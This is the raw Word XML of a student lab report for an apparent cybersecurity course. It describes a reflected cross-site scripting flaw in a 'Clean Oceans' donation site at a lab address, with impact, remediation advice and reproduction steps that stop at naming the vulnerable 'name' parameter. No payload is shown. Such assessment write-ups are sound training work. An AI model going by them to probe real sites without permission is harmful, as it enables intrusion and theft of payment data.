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FB50D" w14:textId="75095D33" w:rsidR="00B0390B" w:rsidRPr="009D41A8" w:rsidRDefault="3EE847B1" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>CSOC 10</w:t>
      </w:r>
      <w:r w:rsidR="00033640">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0: </w:t>
      </w:r>
      <w:r w:rsidR="001D2509">
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r>
        <w:t>Assignment #</w:t>
      </w:r>
      <w:r w:rsidR="00273928">
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566182C0" w14:textId="56B063FA" w:rsidR="00B0390B" w:rsidRPr="00B0390B" w:rsidRDefault="00513C59" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>September 30</w:t>
      </w:r>
      <w:r w:rsidR="3EE847B1">
        <w:t>, 202</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51385712" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5081F98D" w14:textId="41A351EF" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="00BD6154">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared By: </w:t>
      </w:r>
      <w:r w:rsidR="00442EDA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ashish Hedau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225623C7" w14:textId="77777777" w:rsidR="00163836" w:rsidRDefault="00163836" w:rsidP="00B0390B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48654649" w14:textId="77777777" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="006A5F39">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1415546591"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="12E70565" w14:textId="3A011006" w:rsidR="00930EBB" w:rsidRDefault="00930EBB">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1998D4B9" w14:textId="6ADA50E9" w:rsidR="004A26B6" w:rsidRDefault="00930EBB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc147003103" w:history="1">
            <w:r w:rsidR="004A26B6" w:rsidRPr="005217D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reflected Cross-site scripting vulnerability affecting http://10.5.50.50 leading to altered web page contents.</w:t>
            </w:r>
            <w:r w:rsidR="004A26B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004A26B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004A26B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147003103 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004A26B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004A26B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004A26B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004A26B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1725746F" w14:textId="61EF4407" w:rsidR="004A26B6" w:rsidRDefault="004A26B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147003104" w:history="1">
            <w:r w:rsidRPr="005217D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147003104 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12F074C8" w14:textId="0236A70E" w:rsidR="004A26B6" w:rsidRDefault="004A26B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147003105" w:history="1">
            <w:r w:rsidRPr="005217D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147003105 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DBCE7D0" w14:textId="51AB0CF9" w:rsidR="004A26B6" w:rsidRDefault="004A26B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147003106" w:history="1">
            <w:r w:rsidRPr="005217D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147003106 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4315D128" w14:textId="2E973C48" w:rsidR="004A26B6" w:rsidRDefault="004A26B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc147003107" w:history="1">
            <w:r w:rsidRPr="005217D0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to Reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147003107 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43C6B63A" w14:textId="3705C705" w:rsidR="00930EBB" w:rsidRDefault="00930EBB">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="712E4D82" w14:textId="07C499F4" w:rsidR="00B0390B" w:rsidRDefault="00B0390B" w:rsidP="006A5F39">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4398A1A2" w14:textId="32698CA3" w:rsidR="00930EBB" w:rsidRDefault="00930EBB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD7A272" w14:textId="1F2E5ED6" w:rsidR="00123DCA" w:rsidRPr="00782E20" w:rsidRDefault="00442EDA" w:rsidP="00782E20">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc147003103"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Reflected Cross-site scripting vulnerability affecting </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00E82C57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.5.50.50</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> leading to altered web page contents.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="76262C90" w14:textId="77777777" w:rsidR="00782E20" w:rsidRPr="00782E20" w:rsidRDefault="00782E20" w:rsidP="00782E20"/>
    <w:p w14:paraId="14BC6420" w14:textId="77777777" w:rsidR="00123DCA" w:rsidRDefault="3EE847B1" w:rsidP="0071459E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc147003104"/>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2D03A70E" w14:textId="7A24C238" w:rsidR="00DF79E7" w:rsidRDefault="00220EBA" w:rsidP="3EE847B1">
      <w:r>
        <w:t xml:space="preserve">The assessed web application in scope </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00E82C57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.5.50.50</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (Clean Oceans) features a landing page in which users can login and make donations towards cleaning the ocean. Before making the donations, the user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enter personal information like credit card numbers, CVV, country code, name, postal code and amount before making the donations. A Reflected Cross-site Scripting (XSS) vulnerability has been identified in the web application. This vulnerability allows an attacker to inject malicious scripts into web page content, which, when viewed by users, can lead to alteration of the web page’s appearance and functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472427C4" w14:textId="3492BD93" w:rsidR="00DF79E7" w:rsidRDefault="00DF79E7" w:rsidP="3EE847B1">
      <w:r>
        <w:t xml:space="preserve">Please read CWE-83: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00E82C57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/83.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48238903" w14:textId="77777777" w:rsidR="007356F4" w:rsidRDefault="007356F4" w:rsidP="00123DCA"/>
    <w:p w14:paraId="2AE8F101" w14:textId="59BA0B3A" w:rsidR="00123DCA" w:rsidRDefault="3EE847B1" w:rsidP="0071459E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc147003105"/>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="1AA7193A" w14:textId="44F07EE7" w:rsidR="3EE847B1" w:rsidRDefault="00CF4F9F" w:rsidP="3EE847B1">
      <w:r>
        <w:t xml:space="preserve">The impact of this vulnerability encompasses a range of potential consequences. Users may experience modified web page contents that can mislead or confuse them, while attackers can seize opportunities to steal </w:t>
      </w:r>
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sensitive user data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, including personal information, potentially leading to unauthorized actions, or even </w:t>
      </w:r>
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>financial losses</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CC495" w14:textId="77777777" w:rsidR="007356F4" w:rsidRDefault="007356F4" w:rsidP="00123DCA"/>
    <w:p w14:paraId="67094FF1" w14:textId="6180DCB1" w:rsidR="00123DCA" w:rsidRDefault="3EE847B1" w:rsidP="0071459E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc147003106"/>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="587D418A" w14:textId="12D009D0" w:rsidR="00C70ED3" w:rsidRDefault="00DF79E7" w:rsidP="00123DCA">
      <w:r>
        <w:t>To mitigate this issue, we recommend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA1676A" w14:textId="4A407156" w:rsidR="00DF79E7" w:rsidRDefault="00DF79E7" w:rsidP="00DF79E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rigorous input validation and sanitization, ensuring that user-provided data adheres to expected formats and ranges while removing or escaping malicious characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE67061" w14:textId="567B911A" w:rsidR="00DF79E7" w:rsidRDefault="00DF79E7" w:rsidP="00B16481">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Employ context-aware output encoding techniques to encode user-generated content before rendering it in HTML, JavaScript, or other contexts</w:t>
      </w:r>
      <w:r w:rsidR="00B16481">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71F7F3" w14:textId="2AFCF546" w:rsidR="00DF79E7" w:rsidRPr="00B16481" w:rsidRDefault="00B16481" w:rsidP="00B16481">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement a robust Content Security Policy to define trusted sources of content, restrict inline script execution</w:t>
      </w:r>
      <w:r w:rsidR="00DF79E7" w:rsidRPr="00B16481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:vanish/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Top of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036B68B" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="00123DCA"/>
    <w:p w14:paraId="767F3A39" w14:textId="15C5EB7E" w:rsidR="001435BC" w:rsidRDefault="001435BC" w:rsidP="001435BC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc147003107"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="70036449" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B"/>
    <w:p w14:paraId="2B13AA29" w14:textId="5752592B" w:rsidR="006D1B38" w:rsidRPr="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Landing page of </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="006D1B38" w:rsidRPr="00E82C57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.5.50.50</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DAE12DB" w14:textId="71B854A7" w:rsidR="00CF78EE" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>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479476B7" wp14:editId="173C0867">
            <wp:extent cx="8229600" cy="3866515"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1594805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05674"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229600" cy="3866515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608980F" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3561CDAF" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5404AA0B" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582E211E" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0F85D9" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A630F4D" w14:textId="77777777" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A31FA7" w14:textId="527C4413" w:rsidR="001B017B" w:rsidRDefault="001B017B" w:rsidP="001B017B">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="003B4C98" w:rsidRPr="00145656">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145656">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>: The vulnerable ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="003B4C98">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
